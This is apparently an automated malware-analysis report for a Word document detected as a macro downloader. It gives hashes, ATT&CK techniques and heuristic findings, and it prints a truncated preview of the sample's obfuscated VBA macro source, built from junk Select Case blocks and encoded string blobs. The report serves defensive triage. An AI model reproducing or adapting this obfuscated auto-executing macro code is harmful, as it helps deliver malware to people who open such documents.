Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b0d7a4a572cfab28…

MALICIOUS

Office (OLE)

178.5 KB Created: 2018-03-22 12:18:00 Authoring application: Microsoft Office Word First seen: 2018-04-12
MD5: af17a4477a6d06d0abf910e17bf49ee3 SHA-1: 4c56dd522ba167d38d217e3479f45b7bc4a45dab SHA-256: b0d7a4a572cfab28ccd34a58171f189c4f2d8315e09a2605af3d0d6e17840004
244 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, indicated by multiple OLE_VBA_ heuristics. The presence of an AutoOpen macro and CreateObject calls suggests an attempt to automatically execute code upon opening. The ClamAV detection and heuristic firings strongly indicate a downloader or droppper functionality, likely attempting to fetch a second-stage payload. No specific family could be identified.

Heuristics 9

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 48458 bytes
SHA-256: 4a195440b8a220f1ab4abe7a7abbd607436f4f5ec8445b6744d1a46207f3e754
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 26 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "DkWAjXPsdIWW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "BIuLWlzGZH"
Function JJmApmWd()
On Error Resume Next
Select Case wnNEpk
         Case 77228
            RTwbU = Hex(3971 - CSng(90033) - 3932 + ChrW(OsoJaq))
            pmkNjJ = kkoDrH
End Select
sBiDBH = vwGiu("G3qAZgBhAGMAZQA3ADAAYwBmAGEAYwAzAGQAMwA4AGIANgAxADYANAA2AGEAOQA5ADUAYgBjAGQAYQBlADAAOAAyADUAYwBkADkAOAA1AGYAYQBkADIAOAA4ADgAOAA1ADAAOQBiAGEANgBlAGUAMQAzADcAMgA5ADcAMgBjADYAMjzhHBc", 4, 170)
Select Case Flnzl
         Case 47948
            idNbkC = Hex(57033 - CSng(6551) - 10372 + ChrW(VwiODz))
            nHmNqf = DuWJHB
End Select
Select Case HJWUdE
         Case 72295
            TwQXHN = Hex(51435 - CSng(27645) - 52715 + ChrW(zrfkU))
            jZzvjI = sSizL
End Select
wNitQqJppb = vwGiu("ZIAzADAAMgBlAGEAZABiADIANwBlAGYAMQAwAGQANgA5AGMAZABhADMAMwBlADYAOQBkADUANAA0ADgAZQA0ADcAMgAxADEAZQBiADUAMAAyADUAYgA3ADcANgAxAGMAYQA5AGYAMQBlAGYANwAxAGIANABhADMAOAA2AGQAOABjADIAOQA0Aka.K", 3, 179)
Select Case jhazu
         Case 81988
            wlSVK = Hex(25308 - CSng(90548) - 60405 + ChrW(JOXpt))
            DEqtKi = EdOPv
End Select
Select Case LziuDi
         Case 68284
            blaVCu = Hex(96635 - CSng(65143) - 76499 + ChrW(uQsFhd))
            QSjFK = cpzLE
End Select
HtjFID = vwGiu("FQA1AGQAZJJj7G", 2, 8)
Select Case IfFdJj
         Case 54231
            AmJOKz = Hex(17462 - CSng(83114) - 62691 + ChrW(GQEpmL))
            VRjwf = jtGfC
End Select
Select Case MLJjzj
         Case 92905
            UFzGk = Hex(36746 - CSng(48357) - 3408 + ChrW(ANVjk))
            wdISG = idYFKk
End Select
IbYzR = vwGiu("IOSADUAj7", 5, 3)
Select Case zMmOli
         Case 41793
            rciRwb = Hex(59406 - CSng(66328) - 45013 + ChrW(RcCMC))
            NpnqcZ = aibBN
End Select
Select Case NjIknP
         Case 15625
            itJXHp = Hex(20691 - CSng(26643) - 3671 + ChrW(wQfaT))
            mstKHG = THjTiv
End Select
IjBPmINniM = vwGiu("rA@ADMANABlAGMAMABkAGEANgA1AGMAMwAwADEANQBjAGMAtfG9", 4, 44)
Select Case LXusdt
         Case 33852
            LzRUY = Hex(9127 - CSng(99745) - 17011 + ChrW(mMhwu))
            ziXzp = aVcST
End Select
Select Case VCbuPP
         Case 79259
            Wcmjw = Hex(40871 - CSng(92808) - 97532 + ChrW(AwIrT))
            EwKMI = FTwVQO
End Select
zLAFEMILG = vwGiu("a1zMwA3ADMAYwA1AGQANwAxADYANAA2ADgAOQA1AGMAYwA0ADkAOQAzADQAMAA5AGIANgBiADYAYgBkAGEANQA2ADYAMAA1ADEAOQAxAGQAYgBkAGIAMwBlAGUAMgA5ADIAZQBjAGQAOAAxADgAMgAwADIAMgBmADEANQBjADkAOAA0ADMAMQAyADYANQBjADEAYwA5AT0oTd", 4, 197)
Select Case wiMbob
         Case 49073
            iVoHC = Hex(92585 - CSng(93153) - 78435 + ChrW(bwBlXv))
            ChiQJ = NjGDAk
End Select
Select Case fwAjMo
         Case 91174
            EWJSW = Hex(92931 - CSng(22076) - 44906 + ChrW(ZzUuV))
            KAwhY = aAlJXj
End Select
qrijbA = vwGiu("lzdn8Ckri", 2, 1)
Select Case jGPfT
         Case 92571
            NoMPp = Hex(54390 - CSng(63974) - 38876 + ChrW(TEjKfq))
            PGWSiW = IzQnn
End Select
Select Case YiRKW
         Case 35543
            UKzHit = Hex(99372 - CSng(13660) - 63285 + ChrW(zOuQP))
            SuSzs = oCBPf
End Select
TvcQwZ = vwGiu("mTFgBiADcAZgA4ADEAYQBkADgAZgBkADEANQA0ADkANABlAGEANQA1ADEAOQBlAGEAZQA1AGEAMgBmADMANgA4ADEAMgA2AGUAOAAxADYAMwA5ADkAMwAzADYAOAAyAGQAMgBjADkAYgBiAGYAMgBkAGYAYwBiADQAZQBlADUAYwA2ADkAYgAzAFY@iX5", 4, 180)
Select Case ksiiB
         Case 92968
            ulJpNO = Hex(47491 - CSng(55366) - 15466 + ChrW(skzIc))
            QDVHIV = GOOdWo
End Select
Select Case huAJj
         Case 87052
            rRUms = Hex(48921 - CSng(99389) - 281 + ChrW(jrbjhr))
            WdpjVq = qOsBEl
End Select
LUCuCpj = vwGiu("4E.PvGMAOAAyAGUANQA4ADkANABmADYANABlADQAZQA5ADUAZAA4ADcANQAwADYAYQBmADQAYwBjADcAYwBlADQAMgA5ADgAMAA0ADEAZgAwA8B",
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.